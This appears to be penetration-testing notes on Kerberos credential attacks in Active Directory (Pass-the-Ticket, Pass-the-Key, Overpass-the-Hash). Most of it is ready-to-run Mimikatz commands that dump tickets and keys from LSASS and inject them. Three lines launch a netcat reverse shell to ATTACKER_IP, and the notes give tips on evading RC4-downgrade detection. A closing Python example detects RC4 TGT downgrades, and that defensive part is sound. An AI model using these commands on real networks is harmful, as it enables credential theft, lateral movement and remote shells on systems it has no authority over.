Kerberos

Pass-the-Ticket (PtT)

This attack reuses stolen Kerberos tickets (TGTs or service tickets) to authenticate to services without the user's password or hash. A stolen TGT can be used to request service tickets for any service until it expires (10 hours by default in AD); a stolen service ticket only works against the single SPN it was issued for.

  1. Extracting Kerberos Tickets

    • Use Mimikatz to export Kerberos tickets from LSASS memory (requires local admin / SeDebugPrivilege; each ticket is written to a .kirbi file in the current directory):

      mimikatz # privilege::debug
      mimikatz # sekurlsa::tickets /export
  2. Using Extracted Tickets

    • Inject a specific ticket into the current logon session; subsequent Kerberos authentication from this session uses it:

      mimikatz # kerberos::ptt [TICKET_FILE_NAME].kirbi

Pass-the-Key (PtK)

This attack uses the user's long-term Kerberos keys (rc4-hmac, aes128-cts, or aes256-cts), extracted from memory, instead of the password to authenticate as that user. It is a more versatile extension of Pass-the-Hash (PtH): the rc4-hmac key is literally the NT hash, while the AES keys are derived from the password with a salt (uppercase realm + username) and so are bound to one account.

  1. Extracting Kerberos Keys

    • Retrieve the long-term encryption keys (RC4, AES128, AES256) from LSASS memory:

      mimikatz # privilege::debug
      mimikatz # sekurlsa::ekeys
  2. Using Extracted Keys

    • Launch a process whose logon session authenticates with the extracted key; any Kerberos traffic from that process then obtains tickets as the target user (the AES variants avoid the RC4 downgrade that defenders watch for):

    • If RC4 Key (Equivalent to NTLM Hash):

      mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /rc4:RC4_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
    • If AES128 Key:

      mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /aes128:AES128_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
    • If AES256 Key:

      mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /aes256:AES256_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

Overpass-the-Hash (OPtH)

  • Concept:

    • The rc4-hmac Kerberos key of a user is byte-for-byte the NTLM (NT) hash of the user's password.

    • If the NT hash is available, it can be used as the pre-authentication key in an AS-REQ to obtain a Ticket Granting Ticket (TGT), provided rc4-hmac is still an allowed encryption type for the account and the domain. The `sekurlsa::pth /rc4:` command above is exactly this: the hash is never sent to the service; it is turned into Kerberos tickets first.

  • Key Details:

    • NTLM hash = RC4 key, so no password cracking is needed.

    • Used to perform Kerberos authentication without the original password, so it works even against services that reject NTLM.

    • Caveat: a TGT obtained this way is encrypted with etype 0x17 (rc4-hmac). On a domain where users normally get aes256 (0x12) tickets, the resulting 4768 event with 0x17 is a visible downgrade; using the AES keys instead blends in.
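Because the RC4 requirement is also the main detection opportunity, the following added example (not part of the original notes, not a Microsoft or mimikatz tool) shows the check a defender would run: baseline which accounts normally request TGTs under AES, then flag any 4768 for those accounts whose ticket encryption type is rc4-hmac. The event records are constructed in-line with made-up accounts and IPs; a real pipeline would fill them from the Security log's 4768 "Ticket Encryption Type" field.

```python
from dataclasses import dataclass
from typing import Iterable, List, Set, Tuple

# Ticket encryption type values as logged in Windows event 4768 (TGT request).
ETYPE_NAMES = {
    0x01: "des-cbc-crc",
    0x03: "des-cbc-md5",
    0x11: "aes128-cts-hmac-sha1-96",
    0x12: "aes256-cts-hmac-sha1-96",
    0x17: "rc4-hmac",
    0x18: "rc4-hmac-exp",
}
RC4_ETYPES = {0x17, 0x18}
AES_ETYPES = {0x11, 0x12}


@dataclass
class KerbEvent:
    """Minimal view of a 4768 event: who asked, from where, and which etype the TGT got."""
    event_id: int
    account: str
    client_ip: str
    etype: int


def baseline_aes_accounts(events: Iterable[KerbEvent]) -> Set[str]:
    """Accounts that have obtained at least one AES-encrypted TGT; these should
    not suddenly appear with RC4 tickets."""
    return {ev.account for ev in events if ev.event_id == 4768 and ev.etype in AES_ETYPES}


def flag_rc4_downgrades(events: List[KerbEvent]) -> List[Tuple[str, str]]:
    """Return (account, client_ip) for every RC4 TGT issued to an account that is
    known to use AES. Accounts that only ever use RC4 (legacy service accounts)
    are not flagged, which keeps the rule quiet on noisy but expected traffic."""
    aes_accounts = baseline_aes_accounts(events)
    hits = []
    for ev in events:
        if ev.event_id == 4768 and ev.etype in RC4_ETYPES and ev.account in aes_accounts:
            hits.append((ev.account, ev.client_ip))
    return hits


# Constructed sample log: normal AES activity, one legacy RC4-only account,
# and one RC4 TGT for an admin who otherwise always gets AES tickets.
SAMPLE_EVENTS = [
    KerbEvent(4768, "alice", "10.0.0.21", 0x12),
    KerbEvent(4768, "Administrator", "10.0.0.5", 0x12),
    KerbEvent(4768, "alice", "10.0.0.21", 0x12),
    KerbEvent(4768, "svc_legacy", "10.0.0.40", 0x17),
    KerbEvent(4768, "Administrator", "10.0.0.99", 0x17),
]

if __name__ == "__main__":
    for account, ip in flag_rc4_downgrades(SAMPLE_EVENTS):
        print(f"RC4 TGT for AES-capable account {account} from {ip} ({ETYPE_NAMES[0x17]})")
```

A per-account baseline matters more than the raw etype: domains still carry accounts that genuinely cannot do AES, and alerting on every 0x17 buries the one admin whose hash was replayed from an unfamiliar host.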
